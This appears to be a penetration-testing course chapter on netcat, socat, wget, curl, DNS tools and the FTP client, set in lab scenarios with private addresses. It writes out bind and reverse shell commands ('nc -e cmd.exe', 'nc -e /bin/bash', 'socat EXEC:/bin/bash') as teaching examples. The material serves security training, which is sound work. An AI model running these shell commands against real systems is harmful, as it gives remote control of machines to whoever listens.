One of the most useful features of Netcat is its ability to do command redirection. The netcat-traditional version of Netcat (compiled with the "-DGAPING_SECURITY_HOLE" flag) enables the -e option, which executes a program after making or receiving a successful connection. This powerful feature opened up all sorts of interesting possibilities from a security perspective and is therefore not available in most modern Linux/BSD systems. However, due to the fact that Kali Linux is a penetration testing distribution, the Netcat version included in Kali supports the -e option.

When enabled, this option can redirect the input, output, and error messages of an executable to a TCP/UDP port rather than the default console.

For example, consider the cmd.exe executable. By redirecting stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt on the target computer.

To clarify this, let's run through a few more scenarios involving Bob and Alice.

Netcat Bind Shell Scenario

In our first scenario, Bob (running Windows) has requested Alice's assistance (who is running Linux) and has asked her to connect to his computer and issue some commands remotely. Bob has a public IP address and is directly connected to the Internet. Alice, however, is behind a NATed connection, and has an internal IP address. To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his public IP address and asks Alice to connect to his particular IP address and port.

Bob will check his local IP address, then run Netcat with the -e option to execute cmd.exe once a connection is made to the listening port:

C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.11.0.22
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.11.0.1

C:\Users\offsec> nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...

Now Netcat has bound TCP port 4444 to cmd.exe and will redirect any input, output, or error messages from cmd.exe to the network. In other words, anyone connecting to TCP port 4444 on Bob's machine (hopefully Alice) will be presented with Bob's command prompt. This is indeed a "gaping security hole"!

$ ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0
          
$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.11.0.22
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.11.0.1

Reverse Shell Scenario

In our second scenario, Alice needs help from Bob. However, Alice has no control over the router in her office, and therefore cannot forward traffic from the router to her internal machine.

In this scenario, we can leverage another useful feature of Netcat; the ability to send a command shell to a host listening on a specific port. In this situation, although Alice cannot bind a port to /bin/bash locally on her computer and expect Bob to connect, she can send control of her command prompt to Bob's machine instead. This is known as a reverse shell. To get this working, Bob will first set up Netcat to listen for an incoming shell. We will use port 4444 in our example:

C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...

Now, Alice can send a reverse shell from her Linux machine to Bob. Once again, we use the -e option to make an application available remotely, which in this case happens to be /bin/bash, the Linux shell:

$ ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0
          
$ nc -nv 10.11.0.22 4444 -e /bin/bash
(UNKNOWN) [10.11.0.22] 4444 (?) open

Once the connection is established, Alice's Netcat will have redirected /bin/bash input, output, and error data streams to Bob's machine on port 4444, and Bob can interact with that shell:

C:\Users\offsec>nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43482

ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0

Socat

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.

While there are a multitude of things that socat can do, we will only cover a few of them to illustrate its use. Let's begin exploring socat and see how it compares to Netcat.

Netcat vs Socat

First, let's connect to a remote server on port 80 using both Netcat and socat:

$ nc <remote server's ip address> 80

$ socat - TCP4:<remote server's ip address>:80

Note that the syntax is similar, but socat requires the - to transfer data between STDIO and the remote host (allowing our keyboard interaction with the shell) and protocol (TCP4). The protocol, options, and port number are colon-delimited.

Because root privileges are required to bind a listener to ports below 1024, we need to use sudo when starting a listener on port 443:

$ sudo nc -lvp 443

$ sudo socat TCP4-LISTEN:443 STDOUT

Notice the required addition of both the protocol for the listener (TCP4-LISTEN) and the STDOUT argument, which redirects standard output.

Socat File Transfers

Next, we will try out file transfers. Continuing with the previous fictional characters of Alice and Bob, assume Alice needs to send Bob a file called secret_passwords.txt. As a reminder, Alice's host machine is running on Linux, and Bob's is running Windows. Let's see this in action.

On Alice's side, we will share the file on port 443. In this example, the TCP4-LISTEN option specifies an IPv4 listener, fork creates a child process once a connection is made to the listener, which allows multiple connections, and file: specifies the name of a file to be transferred:

$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

On Bob's side, we will connect to Alice's computer and retrieve the file. In this example, the TCP4 option specifies IPv4, followed by Alice's IP address (10.11.0.4) and listening port number (443), file: specifies the local file name to save the file to on Bob's computer, and create specifies that a new file will be created:

C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"

Socat Reverse Shells

Let's take a look at a reverse shell using socat. First, Bob will start a listener on port 443. To do this, he will supply the -d -d option to increase verbosity (showing fatal, error, warning, and notice messages), TCP4-LISTEN:443 to create an IPv4 listener on port 443, and STDOUT to connect standard output (STDOUT) to the TCP socket:

C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[4388] N listening on AF=2 0.0.0.0:443

Next, Alice will use socat's EXEC option (similar to the Netcat -e option), which will execute the given program once a remote connection is established. In this case, Alice will send a /bin/bash reverse shell (with EXEC:/bin/bash) to Bob's listening socket on 10.11.0.22:443:

$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash

Once connected, Bob can enter commands from his socat session, which will execute on Alice's machine.

... socat[4388] N accepting connection from AF=2 10.11.0.4:54720 on 10.11.0.22:443
... socat[4388] N using stdout for reading and writing
... socat[4388] N starting data transfer loop with FDs [4,4] and [1,1]
whoami
kali
id
uid=1000(kali) gid=1000(kali) groups=1000(kali)

HTTP (wget, curl)

wget is a very useful utility to download files from a web server. wget is derived from World Wide Web and 'get.' Typing 'wget' in the Linux terminal will display the usage for the utility.

$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.

To get an idea of how to use wget, let's download the syllabus for the course after this (PEN-200). The PDF is located at https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf. In the Linux Terminal, we'll enter the following.

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
--2021-06-30 06:27:55--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘penetration-testing-with-kali.pdf’

penetration-testing-with-kali.pdf                       100%[============================================================================================================================>] 660.45K   743KB/s    in 0.9s    

2021-06-30 06:27:56 (743 KB/s) - ‘penetration-testing-with-kali.pdf’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  Music  penetration-testing-with-kali.pdf  Pictures  Public  Templates  Videos

Next, we will cover how to rename the downloaded file. This can be done with the '-O' option. This is a capital 'o.' The lowercase 'o' option will log the messages displayed on the terminal to the file specified. The two options will be demonstrated.

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -O PEN-200-Syllabus.pdf
--2021-06-30 06:59:31--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘PEN-200-Syllabus.pdf’

PEN-200-Syllabus.pdf                                    100%[============================================================================================================================>] 660.45K  2.31MB/s    in 0.3s    

2021-06-30 06:59:32 (2.31 MB/s) - ‘PEN-200-Syllabus.pdf’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  Music  PEN-200-Syllabus.pdf  penetration-testing-with-kali.pdf  Pictures  Public  Templates  Videos

$ file PEN-200-Syllabus.pdf
PEN-200-Syllabus.pdf: PDF document, version 1.5

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -o log

$ file log
log: UTF-8 Unicode text

$ cat log
--2021-06-30 07:02:17--  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Resolving www.offensive-security.com (www.offensive-security.com)... 192.124.249.5
Connecting to www.offensive-security.com (www.offensive-security.com)|192.124.249.5|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676301 (660K) [application/pdf]
Saving to: ‘penetration-testing-with-kali.pdf.1’

     0K .......... .......... .......... .......... ..........  7%  842K 1s
    50K .......... .......... .......... .......... .......... 15%  966K 1s
   100K .......... .......... .......... .......... .......... 22%  168M 0s
   150K .......... .......... .......... .......... .......... 30% 3.04M 0s
   200K .......... .......... .......... .......... .......... 37% 2.55M 0s
   250K .......... .......... .......... .......... .......... 45% 1.13M 0s
   300K .......... .......... .......... .......... .......... 52% 3.04M 0s
   350K .......... .......... .......... .......... .......... 60% 1.53M 0s
   400K .......... .......... .......... .......... .......... 68% 1.62M 0s
   450K .......... .......... .......... .......... .......... 75%  891K 0s
   500K .......... .......... .......... .......... .......... 83% 4.03M 0s
   550K .......... .......... .......... .......... .......... 90% 3.01M 0s
   600K .......... .......... .......... .......... .......... 98% 1.50M 0s
   650K ..........                                            100% 7.17M=0.4s

2021-06-30 07:02:17 (1.67 MB/s) - ‘penetration-testing-with-kali.pdf.1’ saved [676301/676301]

$ ls
Desktop  Documents  Downloads  log  Music  PEN-200-Syllabus.pdf  penetration-testing-with-kali.pdf  penetration-testing-with-kali.pdf.1  Pictures  Public  Templates  Videos

The last thing we'll cover with wget is the '--recursive' option. This is great when the goal is to rebuild a website or copy an entire website onto your host. Be careful when doing this, as some websites contain a lot of data and will fill up your hard drive when pulling it all in. In the following example, I execute wget with the '--recursive' option on https://www.kali.org/. I stopped the website copy by pressing Ctrl+C, after giving it a bit of time, to demonstrate what this looks like after the process is completed.

$ wget --recursive https://www.kali.org/
--2021-07-01 11:42:15--  https://www.kali.org/
Resolving www.kali.org (www.kali.org)... 35.185.44.232
Connecting to www.kali.org (www.kali.org)|35.185.44.232|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35937 (35K) [text/html]
Saving to: ‘www.kali.org/index.html’

www.kali.org/index.html                                 100%[============================================================================================================================>]  35.09K  --.-KB/s    in 0.09s   

2021-07-01 11:42:15 (381 KB/s) - ‘www.kali.org/index.html’ saved [35937/35937]

Loading robots.txt; please ignore errors.
--2021-07-01 11:42:15--  https://www.kali.org/robots.txt
Reusing existing connection to www.kali.org:443.
HTTP request sent, awaiting response... 200 OK
Length: 103 [text/plain]
Saving to: ‘www.kali.org/robots.txt’

www.kali.org/robots.txt                                 100%[============================================================================================================================>]     103  --.-KB/s    in 0s      

2021-07-01 11:42:15 (224 MB/s) - ‘www.kali.org/robots.txt’ saved [103/103]

---
Output trimmed
---

When this process is completed, the website can be searched within the current directory. Let's list the downloaded content in the terminal.

$ ls
Desktop  Documents  Downloads  Music  PEN-200-Syllabus.pdf  Pictures  Public  Templates  Videos  www.kali.org

$ ls www.kali.org
about-us  community  css   downloads  get-kali         images      index.min.css  kali-nethunter  partnerships-sponsorships  releases    rss.xml        sitemap.xml
blog      contact    docs  features   get-kali.min.js  index.html  index.min.js   newsletter      plugins                    robots.txt  script.min.js  style.min.css

wget neatly organizes the downloaded content in the same structure as the website. This may be a useful activity for a security professional to search an entire website for things like cleartext credentials, databases, uncontrolled directories, etc.

Another client we can use to copy files from servers is cURL. The name stands for "Client URL." curl is extremely powerful in that it includes an incredible amount of options that can be added to manipulate the request to the server. We'll cover the following options: --silent (don't show progress meter or error message), -o (output file), -k (suppresses certificate errors), and -x (using a proxy). Before we begin with the options, let's take a look at the most basic usage. The previous files that were downloaded with wget were removed before these exercises.

$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

$ curl https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

In the output above, the most basic execution of curl did not work. This is because we were attempting to download a PDF file, which doesn't render the same as a webpage or plaintext content. Let's follow the advice from the error message and add the output option (-o) with a name for the file.

$ curl https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf -o PEN-200-Syllabus.pdf
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  660k  100  660k    0     0   436k      0  0:00:01  0:00:01 --:--:--  435k
 
$  file PEN-200-Syllabus.pdf
PEN-200-Syllabus.pdf: PDF document, version 1.5

We followed the advice of the output error and added an output option (-o) to give the downloaded file a name. This file was then downloaded and can be verified as a PDF, using the 'file' command. Let's take another look at the basic usage of curl, but this time on a webpage and not a file.

$ curl https://kali.org/
<!doctype html><html lang=en-us><head itemscope itemtype=https://www.kali.org/><meta charset=utf-8><meta name=viewport content="width=device-width"><title itemprop=name>Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution</title><meta itemprop=name content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta name=application-name content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta name=twitter:title content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta property="og:site_name" content="Kali Linux"><meta property="og:title" content="Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution"><meta itemprop=description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=twitter:description content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta property="og:description" content="Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments."><meta name=keywords content="kali,linux,kalilinux,Penetration,Testing,Penetration Testing,Distribution,Advanced"><meta name=apple-mobile-web-app-status-bar-style content="black-translucent"><meta name=msapplication-navbutton-color content="#367BF0"><meta name=theme-color content="#367BF0"><meta name=language content="English"><meta property="og:locale" content="en_US"><meta itemprop=image content="https://www.kali.org//images/kali-logo.svg"><meta name=twitter:image content="https://www.kali.org//images/kali-logo.svg"><meta name=twitter:image:src content="https://www.kali.org//images/kali-logo.svg"><meta property="og:image" content="https://www.kali.org//images/kali-logo.svg"><meta property="og:updated_time" content="2021-06-29T00:00:00Z"><meta name=twitter:site content="@kalilinux"><meta name=twitter:creator content="@kalilinux"><link rel="alternate icon" class=js-site-favicon type=image/png href=https://www.kali.org/images/favicon.png><link rel=icon class=js-site-favicon type=image/svg+xml href=https://www.kali.org/images/favicon.svg><base href=https://www.kali.org/><link rel=canonical href=https://www.kali.org/ itemprop=url><meta name=twitter:url content="https://www.kali.org/"><meta name=url content="https://www.kali.org/"><meta property="og:url" content="https://www.kali.org/"><link rel=sitemap type=application/xml title=Sitemap href=https://www.kali.org/sitemap.xml><link href=https://www.kali.org/rss.xml type=application/rss+xml title="Kali Linux" rel=alternate><link href=https://www.kali.org/rss.xml type=application/rss+xml title="Kali Linux" rel=feed><link href=https://www.kali.org/style.min.css rel=stylesheet><style>:root{--primary-color:#367BF0;--body-color:#f9f9f9;--text-color:#636363;--text-color-dark:#242738;--white-color:#ffffff;--light-color:#f8f9fa;--font-family:Noto Sans}body.dark-theme{--body-color:black;--text-color:#e1e1e1;--text-color-dark:white;--white-color:#121212;--light-color:#1A1A1A}</style><script>const 
$=document.querySelector.bind(document),$=document.querySelectorAll.bind(document)</script></head><body><header class=bg-cover><nav class=container><a id=logo href=https://www.kali.org/ style=background-image:url(https://www.kali.org//images/kali-logo.svg)></a><ul id=navigation><li><a href=/get-kali/>Get Kali</a></li><li><a href=/blog/>Blog</a></li><li class=dropdown-menu><span>Documentation <i class=ti-angle-down></i></span><div><a href=/docs/>Kali Linux Documentation</a>
<a href=https://tools.kali.org/>Kali Tools Documentation</a>
---
Output trimmed 

Let's now look at another site that returns an error message when we use the same basic curl syntax.

$ curl https://www.offensive-security.com/
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

Strangely, the same warning appears again. Let's take a look at why this may be happening by examining the HTTP headers with the '-I' option.

$ curl https://www.offensive-security.com/ -I
HTTP/2 200 
server: nginx
date: Wed, 30 Jun 2021 17:57:02 GMT
content-type: text/html; charset=UTF-8
content-length: 14859
x-sucuri-id: 11005
x-xss-protection: 1; mode=block
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubdomains; preload
content-security-policy: upgrade-insecure-requests;
link: <https://www.offensive-security.com/>; rel=shortlink
vary: Accept-Encoding,User-Agent
content-encoding: gzip
x-sucuri-cache: HIT

The reason the output is still being treated as binary is the content-encoding header from the web server. Note that the encoding is 'gzip.' This means the page is delivered as a gzip-compressed stream, which curl registers as binary data. When presented with these types of errors, referring to the man page or searching for the error message online can be incredibly useful. For now, we'll just tell you that the option to use to overcome the error is '--compressed.' Web headers and the way websites work will be further covered in the "Web" section of this course. Let's execute the curl command again with the appropriate option for this site.
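
As a sketch of that command (the decompressed HTML output is omitted here):

$ curl https://www.offensive-security.com/ --compressed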

In line with the subject of erroneous output: in many lab settings, SSL/TLS certificate errors come up. To suppress these errors and continue, the '-k' option can be used. Outside of labs, it is not recommended to use this option unless the web server is known to be trusted. For the next demonstration, https://self-signed.badssl.com/ will be used to exhibit the error and how to overcome it with this option.

$ curl https://self-signed.badssl.com/
curl: (60) SSL certificate problem: self signed certificate
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

When we add the '-k' option, the SSL error will be ignored and the page can be retrieved.

$ curl https://self-signed.badssl.com/ -k
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="/icons/favicon-red.ico"/>
  <link rel="apple-touch-icon" href="/icons/icon-red.png"/>
  <title>self-signed.badssl.com</title>
  <link rel="stylesheet" href="/style.css">
  <style>body { background: red; }</style>
</head>
<body>
<div id="content">
  <h1 style="font-size: 12vw;">
    self-signed.badssl.com
  </h1>
</div>

</body>
</html>

Curl can also leverage a proxy before pulling the content from a web page by adding the '-x' option. The syntax for this is as follows.

curl -x [protocol://]host[:port] URL

The system in this demonstration is taken from VulnHub and is called "SickOS: 1.1". The goal in this demonstration is not to cover the exploitation of this vulnerable machine or the tools involved, but to exhibit the use of a proxy on the system to read web content with curl. SickOS: 1.1 has the IP address of 192.168.56.4 on my system.

$ nmap -A -p- 192.168.56.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 10:22 MST
Nmap scan report for 192.168.56.4
Host is up (0.00064s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:C0:19:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.56.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.44 seconds

Again, don't worry about the details of this nmap scan. What is important for us in this output is port 3128, on which an HTTP proxy (Squid) is listening. Let's try to connect to the standard web port 80 with curl. Note that port 80 isn't shown in the nmap output above; this is purely a demonstration of what the proxy does when used.

$ curl http://192.168.56.4/
curl: (28) Failed to connect to 192.168.56.4 port 80: Connection timed out

Now, let's try to leverage the internal proxy on the system and curl the same webpage.

$ curl -x http://192.168.56.4:3128/ http://192.168.56.4/
<h1>
BLEHHH!!!
</h1>

The page now resolves, and we can clearly see that the OS is sick.

DNS (host, dig, nslookup)

The Domain Name System (DNS) is one of the most critical systems on the Internet and is a distributed database responsible for translating user-friendly domain names into IP addresses.

This is facilitated by a hierarchical structure that is divided into several zones, starting with the top-level root zone. Let's take a closer look at the process and servers involved in resolving a hostname like www.megacorpone.com.

The process starts when a hostname is entered into a browser or other application. The browser passes the hostname to the operating system's DNS client and the operating system then forwards the request to the external DNS server it is configured to use. This first server in the chain is known as the DNS recursor and is responsible for interacting with the DNS infrastructure and returning the results to the DNS client. The DNS recursor contacts one of the servers in the DNS root zone. The root server then responds with the address of the server responsible for the zone containing the Top Level Domain (TLD), in this case, the .com TLD.

Once the DNS recursor receives the address of the TLD DNS server, it queries it for the address of the authoritative nameserver for the megacorpone.com domain. The authoritative nameserver is the final step in the DNS lookup process and contains the DNS records in a local database known as the zone file. It typically hosts two zones for each domain, the forward lookup zone that is used to find the IP address of a specific hostname and the reverse lookup zone (if configured by the administrator), which is used to find the hostname of a specific IP address. Once the DNS recursor provides the DNS client with the IP address for www.megacorpone.com, the browser can contact the correct web server at its IP address and load the webpage.
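
As an aside, this delegation chain can be observed directly with the dig utility (covered later in this section) using its +trace option, which performs the resolution iteratively starting from the root servers; the lengthy output is omitted here:

$ dig +trace www.megacorpone.com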

To improve the performance and reliability of DNS, DNS caching is used to store local copies of DNS records at various stages of the lookup process. That is why some modern applications, such as web browsers, keep a separate DNS cache. In addition, the local DNS client of the operating system also maintains its own DNS cache along with each of the DNS servers in the lookup process. Domain owners can also control how long a server or client caches a DNS record via the Time To Live (TTL) field of a DNS record.

Interacting with a DNS Server

Each domain can use different types of DNS records. Some of the most common types include A (IPv4 host address), AAAA (IPv6 host address), MX (mail exchange), NS (nameserver), CNAME (alias), PTR (reverse pointer), and TXT (arbitrary text) records.

Due to the wealth of information contained within DNS, it is often a lucrative target for active information gathering.

To demonstrate this, we'll use the host command to find the IP address of www.megacorpone.com:

$ host www.megacorpone.com
www.megacorpone.com has address 38.100.193.76

By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records. To do this, we can use the -t option to specify the type of record we are looking for:

$ host -t mx megacorpone.com
megacorpone.com mail is handled by 10 fb.mail.gandi.net.
megacorpone.com mail is handled by 50 mail.megacorpone.com.
megacorpone.com mail is handled by 60 mail2.megacorpone.com.
megacorpone.com mail is handled by 20 spool.mail.gandi.net.

$ host -t txt megacorpone.com
megacorpone.com descriptive text "Try Harder"

Beyond the host command, nslookup and dig can also be used to identify the IP addresses of hosts by their human-readable names. The two are very similar tools. Let's cover the basic usage of nslookup.

$ nslookup kali.org
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   kali.org
Address: 35.185.44.232

The above output shows that kali.org has the IP address of 35.185.44.232. Again, your output may differ if the IP address has changed since the time of this writing. There is more that can be done with nslookup, but let's move on to dig. dig operates similarly to nslookup, and its basic usage is the same.

$ dig kali.org

; <<>> DiG 9.16.15-Debian <<>> kali.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34693
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;kali.org.                      IN      A

;; ANSWER SECTION:
kali.org.               300     IN      A       35.185.44.232

;; Query time: 108 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Jul 09 04:29:53 MST 2021
;; MSG SIZE  rcvd: 53

As can be observed in the output above, the host IP for kali.org is 35.185.44.232. Notice that the default record type for both nslookup and dig is the A record. This can be changed by specifying the type on the command line. In dig, this is done with the -t (type) option. Let's look at what mail servers may be used for kali.org.

$ dig -t mx kali.org

; <<>> DiG 9.16.15-Debian <<>> -t mx kali.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5075
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1280
;; QUESTION SECTION:
;kali.org.                      IN      MX

;; ANSWER SECTION:
kali.org.               1800    IN      MX      15 alt2.aspmx.l.google.com.
kali.org.               1800    IN      MX      10 alt1.aspmx.l.google.com.
kali.org.               1800    IN      MX      5 aspmx.l.google.com.
kali.org.               1800    IN      MX      20 alt3.aspmx.l.google.com.
kali.org.               1800    IN      MX      25 alt4.aspmx.l.google.com.

;; Query time: 56 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Jul 09 04:34:46 MST 2021
;; MSG SIZE  rcvd: 155

dig can also send the request to a specific DNS server. This is done by adding the @ symbol followed by the name or IP address of the DNS server. The following demonstrates a query for kali.org sent to Google's public DNS server.

$ dig @8.8.8.8 kali.org

; <<>> DiG 9.16.15-Debian <<>> @8.8.8.8 kali.org
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46201
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;kali.org.                      IN      A

;; ANSWER SECTION:
kali.org.               71      IN      A       35.185.44.232

;; Query time: 40 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Jul 09 04:47:28 MST 2021
;; MSG SIZE  rcvd: 53

FTP (ftp -vn)

FTP (File Transfer Protocol) is one of the oldest protocols still in use today. It is a very simple protocol for transferring files and can prove to be a treasure trove for a penetration tester or information security professional if the FTP server is misconfigured or its credentials are leaked. There are many instances where sensitive files on an FTP server lead to the compromise of a system. There are also many instances where an FTP server is used to upload files to a web server directory, which an attacker can leverage to place malicious files on the server.

File Transfers

In the following demonstrations, we have a local FTP server. The setup for this is out of scope, as the focus of this section is gaining familiarity with the FTP client against already configured FTP servers. Before beginning, let's take a look at two helpful options for the ftp client. The -v option shows all responses from the FTP server, which can be useful when debugging connectivity issues. There is also a -n option that prevents auto-login to the FTP server. When auto-login is enabled, the client attempts to log in automatically as the current local user, which prevents specifying a different username and password.

The easiest way to access an FTP server is through anonymous access. This is when the username is anonymous and no real password is needed; anything can be entered as the password and the login will be accepted. This is one of the most insecure configurations, as it allows anyone to log into the FTP server. Let's log in with anonymous access.

$  ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> exit
221 Goodbye.

$

When using the -n option, the initial login is a bit different, as the client doesn't prompt for a username or password. Let's go through this process to cover the difference.

$ ftp -nv localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> 

As shown in the listing above, the username and password need to be entered before access is granted to the server. Let's do that now.

$ ftp -nv localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> user anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xrwx    2 65534    65534        4096 Jul 09 05:50 pub
226 Directory send OK.
ftp> exit
221 Goodbye.

There's a pub directory available to the anonymous user on the server. Let's create a file and upload it to that directory. To do this, let's change our current working directory to /var/tmp and create the file there.

$ cd /var/tmp

kali@kali:/var/tmp$ ls
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-colord.service-nZQIAf        systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-systemd-logind.service-3v6WKg
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-haveged.service-WMdLrh       systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-upower.service-Bh7DTe
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-ModemManager.service-V6U3lg

kali@kali:/var/tmp$ echo "This is a file" > upload.txt

kali@kali:/var/tmp$ cat upload.txt
This is a file

kali@kali:/var/tmp$ ls
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-colord.service-nZQIAf        systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-systemd-logind.service-3v6WKg
systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-haveged.service-WMdLrh       systemd-private-7e0fd2ca8df74ba6ab82931917200d6f-upower.service-Bh7DTe
